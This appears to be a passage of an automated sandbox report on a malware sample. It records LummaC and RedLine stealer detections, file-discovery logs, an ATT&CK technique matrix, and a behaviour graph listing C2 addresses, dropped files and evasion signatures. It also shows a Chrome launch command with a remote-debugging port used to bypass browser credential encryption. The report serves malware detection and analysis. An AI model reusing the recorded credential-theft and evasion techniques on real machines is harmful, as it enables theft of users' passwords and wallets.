                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: number of queries: 1001
                    Source: Yara matchFile source: 0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000003.2838159994.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.2814761965.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2190479666.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Attempt to bypass Chrome Application-Bound Encryption
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c130c124d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2343637701.000001C130C03000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 0a7e8af92e.exe PID: 632, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		411
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		2
                    Scheduled Task/Job                    		2
                    Bypass User Account Control                    		21
                    Deobfuscate/Decode Files or Information                    		LSASS Memory22
                    File and Directory Discovery                    		Remote Desktop Protocol41
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		11
                    Registry Run Keys / Startup Folder                    		1
                    Extra Window Memory Injection                    		4
                    Obfuscated Files or Information                    		Security Account Manager347
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Scheduled Task/Job                    		Login Hook112
                    Process Injection                    		12
                    Software Packing                    		NTDS1
                    Query Registry                    		Distributed Component Object ModelInput Capture1
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell                    		Network Logon Script2
                    Scheduled Task/Job                    		1
                    Timestomp                    		LSA Secrets1181
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		Cached Domain Credentials3
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Bypass User Account Control                    		DCSync681
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    File Deletion                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Extra Window Memory Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron113
                    Masquerading                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd681
                    Virtualization/Sandbox Evasion                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task112
                    Process Injection                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580355 Sample: cMTqzvmx9u.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 140 Found malware configuration 2->140 142 Malicious sample detected (through community Yara rule) 2->142 144 Antivirus detection for dropped file 2->144 146 15 other signatures 2->146 8 skotes.exe 4 67 2->8         started        13 cMTqzvmx9u.exe 5 2->13         started        15 skotes.exe 2->15         started        17 4 other processes 2->17 process3 dnsIp4 130 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 8->130 132 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 8->132 134 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 8->134 88 C:\Users\user\AppData\...\aa8c9de034.exe, PE32+ 8->88 dropped 90 C:\Users\user\AppData\...\f53b3c5fe2.exe, PE32 8->90 dropped 92 C:\Users\user\AppData\...\91732ff836.exe, PE32 8->92 dropped 98 27 other malicious files 8->98 dropped 184 Creates multiple autostart registry keys 8->184 186 Hides threads from debuggers 8->186 188 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->188 19 e6e4c20fad.exe 8->19         started        24 0a7e8af92e.exe 8->24         started        26 b9ba85c997.exe 8->26         started        32 8 other processes 8->32 94 C:\Users\user\AppData\Local\...\skotes.exe, PE32 13->94 dropped 96 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 13->96 dropped 190 Detected unpacking (changes PE section rights) 13->190 192 Tries to evade debugger and weak emulator (self modifying code) 13->192 194 Tries to detect virtualization through RDTSC time measurements 13->194 28 skotes.exe 13->28         started        196 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->196 136 23.218.208.109 AS6453US United States 17->136 138 127.0.0.1 unknown unknown 17->138 198 Creates files in the system32 config directory 17->198 200 Tries to harvest and steal browser information (history, passwords, etc) 17->200 30 firefox.exe 17->30         started        file5 signatures6 process7 dnsIp8 110 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 19->110 70 C:\Users\user\AppData\...\softokn3[1].dll, PE32 19->70 dropped 72 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 19->72 dropped 86 10 other files (6 malicious) 19->86 dropped 148 Attempt to bypass Chrome Application-Bound Encryption 19->148 168 6 other signatures 19->168 34 chrome.exe 19->34         started        74 C:\Users\user\AppData\Roaming\...\DJj.exe, PE32 24->74 dropped 150 Multi AV Scanner detection for dropped file 24->150 152 Suspicious powershell command line found 24->152 154 Encrypted powershell cmdline option found 24->154 37 DJj.exe 24->37         started        40 powershell.exe 24->40         started        76 C:\Users\user\...\MZHUJDVAZFQBUC9CQYK.exe, PE32 26->76 dropped 78 C:\Users\...8X4KAZW48ZU3YY0Y4JPME949S3Q.exe, PE32 26->78 dropped 156 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->156 158 Query firmware table information (likely to detect VMs) 26->158 160 Tries to evade debugger and weak emulator (self modifying code) 26->160 162 Detected unpacking (changes PE section rights) 28->162 170 2 other signatures 28->170 112 18.66.161.98 MIT-GATEWAYSUS United States 30->112 114 142.250.181.110 GOOGLEUS United States 30->114 120 13 other IPs or domains 30->120 80 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 30->80 dropped 82 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 30->82 dropped 42 firefox.exe 30->42         started        116 149.154.167.220 TELEGRAMRU United Kingdom 32->116 118 142.250.181.1 GOOGLEUS United States 32->118 122 8 other IPs or domains 32->122 84 C:\Program Files\...\graph.exe, PE32+ 32->84 dropped 164 Binary is likely a compiled AutoIt script file 32->164 166 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->166 172 9 other signatures 32->172 44 WerFault.exe 32->44         started        47 7ddd2a748c.exe 32->47         started        49 taskkill.exe 32->49         started        51 7 other processes 32->51 file9 signatures10 process11 dnsIp12 102 239.255.255.250 unknown Reserved 34->102 53 chrome.exe 34->53         started        104 147.45.44.224 FREE-NET-ASFREEnetEU Russian Federation 37->104 174 Multi AV Scanner detection for dropped file 37->174 176 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->176 178 Found many strings related to Crypto-Wallets (likely being stolen) 37->178 182 3 other signatures 37->182 180 Loading BitLocker PowerShell Module 40->180 56 conhost.exe 40->56         started        58 WmiPrvSE.exe 40->58         started        106 104.208.16.94 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 44->106 100 C:\ProgramData\Microsoft\...\Report.wer, Unicode 44->100 dropped 108 172.67.209.202 CLOUDFLARENETUS United States 47->108 60 conhost.exe 49->60         started        62 conhost.exe 51->62         started        64 conhost.exe 51->64         started        66 conhost.exe 51->66         started        68 conhost.exe 51->68         started        file13 signatures14 process15 dnsIp16 124 142.250.181.68 GOOGLEUS United States 53->124 126 172.217.19.227 GOOGLEUS United States 53->126 128 3 other IPs or domains 53->128

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.